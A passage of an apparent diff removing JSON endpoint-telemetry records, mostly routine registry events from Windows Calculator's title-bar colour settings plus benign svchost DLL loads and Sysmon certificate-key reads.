"ButtonHoverBackgroundColor", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "CapabilityAccessManagerClient.dll", - "image_path": "C:\\Windows\\System32\\CapabilityAccessManagerClient.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": 
"C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": 
"ButtonBackgroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - 
"process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573251200016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573251360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573251360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cellulardatacapabilityhandler.dll", - "image_path": "C:\\Windows\\System32\\cellulardatacapabilityhandler.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573251360000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
